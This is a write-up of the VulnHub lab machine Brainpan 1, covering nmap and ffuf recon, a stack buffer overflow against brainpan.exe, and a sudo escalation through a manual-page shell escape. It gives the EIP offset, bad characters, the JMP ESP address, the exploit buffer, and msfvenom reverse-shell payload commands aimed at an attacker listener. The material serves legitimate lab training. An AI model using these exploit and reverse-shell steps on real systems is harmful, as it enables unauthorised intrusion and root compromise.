Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# Nmap 7.92 scan initiated Thu Feb 3 02:21:55 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/brainpan-1/192.168.110.9/scans/_full_tcp_nmap.txt -oX /root/vulnHub/brainpan-1/192.168.110.9/scans/xml/_full_tcp_nmap.xml 192.168.110.9
Nmap scan report for 192.168.110.9
Host is up, received arp-response (0.00069s latency).
Scanned at 2022-02-03 02:22:10 +08 for 60s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
9999/tcp open abyss? syn-ack ttl 64
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.92%I=9%D=2/3%Time=61FACBDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\
SF:x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x
SF:20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x2
SF:0\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x2
SF:0_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x2
SF:0_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x2
SF:0_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x2
SF:0THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 08:00:27:15:B9:4B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/3%OT=9999%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61
OS:FACC0E%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=
OS:8)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M5
OS:B4ST11NW5%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=389
OS:0)ECN(R=Y%DF=Y%TG=40%W=3908%O=M5B4NNSNW5%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 198.049 days (since Tue Jul 20 01:12:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.110.9
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 3 02:23:10 2022 -- 1 IP address (1 host up) scanned in 75.50 seconds
TCP/9999
- BOF executable running
TCP/10000 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/vulnHub/brainpan-1]
└─# ffuf -u http://$ip:10000/FUZZ -w /usr/share/wordlists/dirb/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.9:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 215, Words: 7, Lines: 9]
bin [Status: 301, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 215, Words: 7, Lines: 9]
:: Progress: [4615/4615] :: Job [1/1] :: 6768 req/sec :: Duration: [0:00:30] :: Errors: 15 ::
bin- contains the BOF executable
Initial Foothold
TCP/10000 (HTTP) - BOF Binary
- Proceed to
/binto download the BOF binary1 2
┌──(root💀kali)-[~/vulnHub/brainpan-1/192.168.110.9/exploit] └─# wget http://192.168.110.9:10000/bin/brainpan.exe -q
- Transfer it to Windows machine to create a payload.
BOF
- Determine min buffer size till EIP overflows with A
- Program crashed at 600As
![]()
- EIP is filled with As.
- Program crashed at 600As
- Determine EIP
- via msf-pattern_create
1 2 3
┌──(root💀kali)-[~/vulnHub/brainpan-1/192.168.110.9/exploit] └─# msf-pattern_create -l 600 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9![]()
- Pattern Address:
35724134
- via msf-pattern_create
- Determine EIP offset
- via msf-pattern_offset
1 2 3
┌──(root💀kali)-[~/vulnHub/brainpan-1/192.168.110.9/exploit] └─# msf-pattern_offset -q 35724134 [*] Exact match at offset 524
- or via mona
1
!mona findmsp -distance 600
![]()
- EIP offset: 524
- via msf-pattern_offset
- Test with Bs
1
buffer = b"A" * 524 + b"B" * 4
- Make sure
42424242is at EIP![]()
- Make sure
- Determine badchars
- badChars:
\x00![]()
- badChars:
\x00
- badChars:
- badChars:
- Determine JMP
- Module must not have any protection settings
False: Rebase, SafeSEH, ASLR, NXCompact, OS DLL - Pick a module that belongs to to the bufferoverflow.exe
- JMP Addr must not have any of the identified badChars
1 2 3 4 5 6 7 8 9 10 11 12
# Method 1: !mona jmp -r esp !mona jmp -r esp -cpb "badChars" # Method 2: 1. !mona modules 2. Pick a module that belongs to the bufferoverflow.exe 3. !mona find -s "xff\xef" -m <module name>, (etc; essfunc.dll) 4. Pick a return addr (Must not contain any badChars) # Method 3: Top-Left box -> Right-Click -> Search For -> All commands in all modules -> Type JMP ESP
![]()
- Return Address:
0x311712f3- brainpan.exe - Little Endian:
\xf3\x12\x17\x31 - Make sure EIP points to the selected JMP Address
- Check
bp 0x311712f3![]()
- EIP Points to
brainpan.exe
- Check
- Module must not have any protection settings
- Generate Shellcode
1
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.1.108 LPORT=4444 EXITFUNC=thread -b '\x00' -f python
- Exploit
- offset (the number of As to reach EIP)
- returnAdd (EIP)
- NOP
- Shellcode
1
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + NOP + buf
![]()
- Obtained shell on Windows Machine
TCP/9999 - BOF
- Generate the payload again
1
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.110.4 LPORT=4444 EXITFUNC=thread -b '\x00' -f python
- Change IP address in
exploit.py - Exploit
![]()
- Obtained shell, but the machine is Linux
![]()
- Switch payload to linux
1
msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=192.168.110.4 LPORT=4444 EXITFUNC=thread -b '\x00' -f python
- Restart Machine & Exploit
![]()
Privilege Escalation
Root - Via Sudo (GTFO Bin)
- Check sudo access
1 2 3 4 5 6 7
puck@brainpan:/$ sudo -l Matching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_util puck@brainpan:/$ Execute
/home/anansi/bin/anansi_util, to see what it does1 2 3 4 5 6 7
puck@brainpan:/$ sudo /home/anansi/bin/anansi_util Usage: /home/anansi/bin/anansi_util [action] Where [action] is one of: - network - proclist - manual [command] puck@brainpan:/$
manual, has a GTFOBins entry
- Exploit
1 2
puck@brainpan:/$ sudo /home/anansi/bin/anansi_util manual man #!/bin/sh
![]()
- Obtain Root Flag
1 2 3 4 5 6 7 8 9 10 11
# cat b.txt _| _| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| _| _| _|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _| _| _| http://www.techorganic.com
Comments powered by Disqus.